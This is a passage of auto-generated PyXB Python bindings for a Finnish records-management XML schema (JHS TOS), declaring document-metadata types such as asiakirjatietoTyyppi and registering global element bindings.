        __VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
        __VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
        __Laajennos.name() : __Laajennos,
        __Toimenpidetiedot.name() : __Toimenpidetiedot,
        __Asiakirjatieto.name() : __Asiakirjatieto
    })
    # Register the (required) 'id' attribute use.
    _AttributeMap.update({
        __id.name() : __id
    })
# Publish the binding at module scope and in the namespace's category registry.
_module_typeBindings.toimenpidetiedotTyyppi = toimenpidetiedotTyyppi
Namespace.addCategoryObject('typeBinding', 'toimenpidetiedotTyyppi', toimenpidetiedotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiakirjatietoTyyppi with content type ELEMENT_ONLY
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiakirjatietoTyyppi with content type ELEMENT_ONLY
class asiakirjatietoTyyppi (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiakirjatietoTyyppi with content type ELEMENT_ONLY

    PyXB-generated binding class (do not edit by hand; regenerate from the
    schema instead).  Each child element of the complex type is declared as a
    private ElementDeclaration and exposed as a like-named Python property;
    the required ``id`` attribute is declared the same way via AttributeUse.
    """
    # Generated binding boilerplate: content model tag, expanded schema name,
    # and the per-class element/attribute registries populated further below.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'asiakirjatietoTyyppi')
    _XSDLocation = None
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # --- Child element declarations (third positional flag = True means the
    # --- element may occur multiple times, e.g. Laajennos and Asiasanat). ---

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AsiakirjaluokkaTeksti uses Python identifier AsiakirjaluokkaTeksti
    __AsiakirjaluokkaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTeksti'), 'AsiakirjaluokkaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115AsiakirjaluokkaTeksti', False, None, )
    AsiakirjaluokkaTeksti = property(__AsiakirjaluokkaTeksti.value, __AsiakirjaluokkaTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}OrganisaatioNimi uses Python identifier OrganisaatioNimi
    __OrganisaatioNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), 'OrganisaatioNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115OrganisaatioNimi', False, None, )
    OrganisaatioNimi = property(__OrganisaatioNimi.value, __OrganisaatioNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TietojarjestelmaNimi uses Python identifier TietojarjestelmaNimi
    __TietojarjestelmaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), 'TietojarjestelmaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115TietojarjestelmaNimi', False, None, )
    TietojarjestelmaNimi = property(__TietojarjestelmaNimi.value, __TietojarjestelmaNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaatijaNimi uses Python identifier LaatijaNimi
    __LaatijaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), 'LaatijaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaatijaNimi', False, None, )
    LaatijaNimi = property(__LaatijaNimi.value, __LaatijaNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}LaadittuPvm uses Python identifier LaadittuPvm
    __LaadittuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), 'LaadittuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115LaadittuPvm', False, None, )
    LaadittuPvm = property(__LaadittuPvm.value, __LaadittuPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokkaajaNimi uses Python identifier MuokkaajaNimi
    __MuokkaajaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), 'MuokkaajaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokkaajaNimi', False, None, )
    MuokkaajaNimi = property(__MuokkaajaNimi.value, __MuokkaajaNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}MuokattuPvm uses Python identifier MuokattuPvm
    __MuokattuPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), 'MuokattuPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115MuokattuPvm', False, None, )
    MuokattuPvm = property(__MuokattuPvm.value, __MuokattuPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyjaNimi uses Python identifier HyvaksyjaNimi
    __HyvaksyjaNimi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), 'HyvaksyjaNimi', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyjaNimi', False, None, )
    HyvaksyjaNimi = property(__HyvaksyjaNimi.value, __HyvaksyjaNimi.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HyvaksyttyPvm uses Python identifier HyvaksyttyPvm
    __HyvaksyttyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), 'HyvaksyttyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115HyvaksyttyPvm', False, None, )
    HyvaksyttyPvm = property(__HyvaksyttyPvm.value, __HyvaksyttyPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloAlkaaPvm uses Python identifier VoimassaoloAlkaaPvm
    __VoimassaoloAlkaaPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), 'VoimassaoloAlkaaPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloAlkaaPvm', False, None, )
    VoimassaoloAlkaaPvm = property(__VoimassaoloAlkaaPvm.value, __VoimassaoloAlkaaPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}VoimassaoloPaattyyPvm uses Python identifier VoimassaoloPaattyyPvm
    __VoimassaoloPaattyyPvm = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), 'VoimassaoloPaattyyPvm', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115VoimassaoloPaattyyPvm', False, None, )
    VoimassaoloPaattyyPvm = property(__VoimassaoloPaattyyPvm.value, __VoimassaoloPaattyyPvm.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}PaatietoryhmatTeksti uses Python identifier PaatietoryhmatTeksti
    __PaatietoryhmatTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), 'PaatietoryhmatTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115PaatietoryhmatTeksti', False, None, )
    PaatietoryhmatTeksti = property(__PaatietoryhmatTeksti.value, __PaatietoryhmatTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AsiakirjaluokkaTarkenneTeksti uses Python identifier AsiakirjaluokkaTarkenneTeksti
    __AsiakirjaluokkaTarkenneTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTarkenneTeksti'), 'AsiakirjaluokkaTarkenneTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115AsiakirjaluokkaTarkenneTeksti', False, None, )
    AsiakirjaluokkaTarkenneTeksti = property(__AsiakirjaluokkaTarkenneTeksti.value, __AsiakirjaluokkaTarkenneTeksti.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
    __Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
    Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Asiasanat uses Python identifier Asiasanat
    __Asiasanat = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), 'Asiasanat', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Asiasanat', True, None, )
    Asiasanat = property(__Asiasanat.value, __Asiasanat.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Kasittelysaannot uses Python identifier Kasittelysaannot
    __Kasittelysaannot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Kasittelysaannot'), 'Kasittelysaannot', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Kasittelysaannot', False, None, )
    Kasittelysaannot = property(__Kasittelysaannot.value, __Kasittelysaannot.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Kayttorajoitustiedot uses Python identifier Kayttorajoitustiedot
    __Kayttorajoitustiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), 'Kayttorajoitustiedot', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Kayttorajoitustiedot', False, None, )
    Kayttorajoitustiedot = property(__Kayttorajoitustiedot.value, __Kayttorajoitustiedot.set, None, None)

    # Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Sailytysaikatiedot uses Python identifier Sailytysaikatiedot
    __Sailytysaikatiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), 'Sailytysaikatiedot', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115Sailytysaikatiedot', False, None, )
    Sailytysaikatiedot = property(__Sailytysaikatiedot.value, __Sailytysaikatiedot.set, None, None)

    # --- Attribute declarations ---

    # Attribute {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}id uses Python identifier id
    # NOTE: required attribute; the Python property deliberately shadows the
    # builtin ``id`` to mirror the schema attribute name (generated code).
    __id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpskeemat_jhs_suositukset_fitos20150115_asiakirjatietoTyyppi_httpskeemat_jhs_suositukset_fitos20150115id', _module_typeBindings.idTyyppi, required=True)
    __id._DeclarationLocation = None
    __id._UseLocation = None
    id = property(__id.value, __id.set, None, None)

    # Register the declarations above in the class-level maps used by the
    # PyXB runtime for (de)serialization.
    _ElementMap.update({
        __AsiakirjaluokkaTeksti.name() : __AsiakirjaluokkaTeksti,
        __OrganisaatioNimi.name() : __OrganisaatioNimi,
        __TietojarjestelmaNimi.name() : __TietojarjestelmaNimi,
        __LaatijaNimi.name() : __LaatijaNimi,
        __LaadittuPvm.name() : __LaadittuPvm,
        __MuokkaajaNimi.name() : __MuokkaajaNimi,
        __MuokattuPvm.name() : __MuokattuPvm,
        __HyvaksyjaNimi.name() : __HyvaksyjaNimi,
        __HyvaksyttyPvm.name() : __HyvaksyttyPvm,
        __VoimassaoloAlkaaPvm.name() : __VoimassaoloAlkaaPvm,
        __VoimassaoloPaattyyPvm.name() : __VoimassaoloPaattyyPvm,
        __PaatietoryhmatTeksti.name() : __PaatietoryhmatTeksti,
        __AsiakirjaluokkaTarkenneTeksti.name() : __AsiakirjaluokkaTarkenneTeksti,
        __Laajennos.name() : __Laajennos,
        __Asiasanat.name() : __Asiasanat,
        __Kasittelysaannot.name() : __Kasittelysaannot,
        __Kayttorajoitustiedot.name() : __Kayttorajoitustiedot,
        __Sailytysaikatiedot.name() : __Sailytysaikatiedot
    })
    _AttributeMap.update({
        __id.name() : __id
    })
# Publish the binding in the module's type registry and in the namespace's
# category map so it can be located by name at runtime.
_module_typeBindings.asiakirjatietoTyyppi = asiakirjatietoTyyppi
Namespace.addCategoryObject('typeBinding', 'asiakirjatietoTyyppi', asiakirjatietoTyyppi)
# ---------------------------------------------------------------------------
# Module-level bindings for the namespace's global element declarations.
# Each pair below creates a pyxb element binding and registers it under the
# 'elementBinding' category of the namespace.  Generated code; regenerate
# from the schema rather than editing by hand.
# ---------------------------------------------------------------------------

# Simple xs:string elements.
OrganisaatioNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', OrganisaatioNimi.name().localName(), OrganisaatioNimi)
TietojarjestelmaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', TietojarjestelmaNimi.name().localName(), TietojarjestelmaNimi)
AsiasanastoTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiasanastoTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', AsiasanastoTeksti.name().localName(), AsiasanastoTeksti)
AsiasanaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiasanaTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', AsiasanaTeksti.name().localName(), AsiasanaTeksti)
PaatietoryhmatTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', PaatietoryhmatTeksti.name().localName(), PaatietoryhmatTeksti)
KokoavanProsessitunnuksenLahdeTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KokoavanProsessitunnuksenLahdeTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', KokoavanProsessitunnuksenLahdeTeksti.name().localName(), KokoavanProsessitunnuksenLahdeTeksti)
AsiakirjaluokkaTarkenneTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTarkenneTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', AsiakirjaluokkaTarkenneTeksti.name().localName(), AsiakirjaluokkaTarkenneTeksti)
# The 'documentation=' strings below come from the schema annotations and are
# intentionally left in Finnish.
JulkisuusluokkaMuutosTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaMuutosTeksti'), pyxb.binding.datatypes.string, documentation='Esimerkiksi: Asian päättäminen, Päätöksenteko (toimenpide), Päätöksen allekirjoitus (toimenpide).', location=None)
Namespace.addCategoryObject('elementBinding', JulkisuusluokkaMuutosTeksti.name().localName(), JulkisuusluokkaMuutosTeksti)
AiempienVersioidenPoistoTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AiempienVersioidenPoistoTeksti'), pyxb.binding.datatypes.string, documentation='Suositeltavat: Asian ratkaisu, Tietty aika asian ratkaisusta, Asiakirjan hävittäminen.', location=None)
Namespace.addCategoryObject('elementBinding', AiempienVersioidenPoistoTeksti.name().localName(), AiempienVersioidenPoistoTeksti)
TallennuspaikkaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TallennuspaikkaTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', TallennuspaikkaTeksti.name().localName(), TallennuspaikkaTeksti)
SailytyspaikkaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytyspaikkaTeksti'), pyxb.binding.datatypes.string, location=None)
Namespace.addCategoryObject('elementBinding', SailytyspaikkaTeksti.name().localName(), SailytyspaikkaTeksti)

# Elements typed with simple-type bindings declared earlier in this module.
TilaKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), tilaKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', TilaKoodi.name().localName(), TilaKoodi)
TosVersio = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TosVersio'), versioTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', TosVersio.name().localName(), TosVersio)
OsaVersio = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OsaVersio'), versioTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', OsaVersio.name().localName(), OsaVersio)
Luokitustunnus = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Luokitustunnus'), luokitustunnusTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Luokitustunnus.name().localName(), Luokitustunnus)
NimekeTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), nimekeTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', NimekeTeksti.name().localName(), NimekeTeksti)
ToimenpiteenKuvausTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpiteenKuvausTeksti'), kuvausTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', ToimenpiteenKuvausTeksti.name().localName(), ToimenpiteenKuvausTeksti)
LuokitusKuvausTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LuokitusKuvausTeksti'), kuvausTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', LuokitusKuvausTeksti.name().localName(), LuokitusKuvausTeksti)
KuvausTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KuvausTeksti'), kuvausTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', KuvausTeksti.name().localName(), KuvausTeksti)
LisatiedotTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LisatiedotTeksti'), lisatiedotTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', LisatiedotTeksti.name().localName(), LisatiedotTeksti)
JulkisuusluokkaKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaKoodi'), julkisuusluokkaKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', JulkisuusluokkaKoodi.name().localName(), JulkisuusluokkaKoodi)
SalassapitoAikaArvo = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoAikaArvo'), salassapitoAikaArvoTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SalassapitoAikaArvo.name().localName(), SalassapitoAikaArvo)
SalassapitoPerusteTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoPerusteTeksti'), salassapitoPerusteTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SalassapitoPerusteTeksti.name().localName(), SalassapitoPerusteTeksti)
SalassapidonLaskentaperusteTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SalassapidonLaskentaperusteTeksti'), salassapidonLaskentaperusteTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SalassapidonLaskentaperusteTeksti.name().localName(), SalassapidonLaskentaperusteTeksti)
SuojaustasoKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuojaustasoKoodi'), suojaustasoKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SuojaustasoKoodi.name().localName(), SuojaustasoKoodi)
TurvallisuusluokkaKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TurvallisuusluokkaKoodi'), turvallisuusluokkaKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', TurvallisuusluokkaKoodi.name().localName(), TurvallisuusluokkaKoodi)
HenkilotietoluonneKoodi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HenkilotietoluonneKoodi'), henkilotietoluonneKoodiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', HenkilotietoluonneKoodi.name().localName(), HenkilotietoluonneKoodi)
SailytysajanPituusArvo = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPituusArvo'), sailytysajanPituusArvoTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SailytysajanPituusArvo.name().localName(), SailytysajanPituusArvo)
SailytysajanPerusteTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanPerusteTeksti'), sailytysajanPerusteTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SailytysajanPerusteTeksti.name().localName(), SailytysajanPerusteTeksti)
SailytysajanLaskentaperusteTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SailytysajanLaskentaperusteTeksti'), sailytysajanLaskentaperusteTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', SailytysajanLaskentaperusteTeksti.name().localName(), SailytysajanLaskentaperusteTeksti)
ToimenpideluokkaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTeksti'), toimenpideluokkaTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', ToimenpideluokkaTeksti.name().localName(), ToimenpideluokkaTeksti)
ToimenpideluokkaTarkenneTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ToimenpideluokkaTarkenneTeksti'), toimenpideluokkaTarkenneTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', ToimenpideluokkaTarkenneTeksti.name().localName(), ToimenpideluokkaTarkenneTeksti)
AsiakirjaluokkaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'AsiakirjaluokkaTeksti'), asiakirjaLuokkaTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', AsiakirjaluokkaTeksti.name().localName(), AsiakirjaluokkaTeksti)
KasittelyprosessinTilaTeksti = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessinTilaTeksti'), kasittelyprosessinTilaTekstiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', KasittelyprosessinTilaTeksti.name().localName(), KasittelyprosessinTilaTeksti)

# Elements whose types come from the imported JHS metarecord binding module
# (name and start/end date types).
LaatijaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', LaatijaNimi.name().localName(), LaatijaNimi)
LaadittuPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', LaadittuPvm.name().localName(), LaadittuPvm)
MuokkaajaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', MuokkaajaNimi.name().localName(), MuokkaajaNimi)
MuokattuPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', MuokattuPvm.name().localName(), MuokattuPvm)
HyvaksyjaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', HyvaksyjaNimi.name().localName(), HyvaksyjaNimi)
HyvaksyttyPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', HyvaksyttyPvm.name().localName(), HyvaksyttyPvm)
VoimassaoloAlkaaPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', VoimassaoloAlkaaPvm.name().localName(), VoimassaoloAlkaaPvm)
VoimassaoloPaattyyPvm = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', VoimassaoloPaattyyPvm.name().localName(), VoimassaoloPaattyyPvm)
YhteyshenkiloNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'YhteyshenkiloNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', YhteyshenkiloNimi.name().localName(), YhteyshenkiloNimi)
ProsessinOmistajaNimi = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ProsessinOmistajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', ProsessinOmistajaNimi.name().localName(), ProsessinOmistajaNimi)

# Elements with complex types (including the anonymous types CTD_ANON for
# the document root 'Tos' and CTD_ANON_ for the 'Laajennos' wildcard
# extension element).
Tos = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Tos'), CTD_ANON, location=None)
Namespace.addCategoryObject('elementBinding', Tos.name().localName(), Tos)
Laajennos = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None)
Namespace.addCategoryObject('elementBinding', Laajennos.name().localName(), Laajennos)
Nimeke = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), nimekeTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Nimeke.name().localName(), Nimeke)
Asiasanat = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), asiasanatTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Asiasanat.name().localName(), Asiasanat)
Kasittelysaannot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Kasittelysaannot'), kasittelysaannotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Kasittelysaannot.name().localName(), Kasittelysaannot)
Kayttorajoitustiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), kayttorajoitusTiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Kayttorajoitustiedot.name().localName(), Kayttorajoitustiedot)
Sailytysaikatiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), sailytysaikaTiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Sailytysaikatiedot.name().localName(), Sailytysaikatiedot)
TosTiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TosTiedot'), TosTiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', TosTiedot.name().localName(), TosTiedot)
Luokka = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Luokka'), luokkaTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', Luokka.name().localName(), Luokka)
NimekeKielella = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeKielella'), nimekeKielellaTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', NimekeKielella.name().localName(), NimekeKielella)
KasittelyprosessiTiedot = pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessiTiedot'), kasittelyprosessiTiedotTyyppi, location=None)
Namespace.addCategoryObject('elementBinding', KasittelyprosessiTiedot.name().localName(), KasittelyprosessiTiedot)
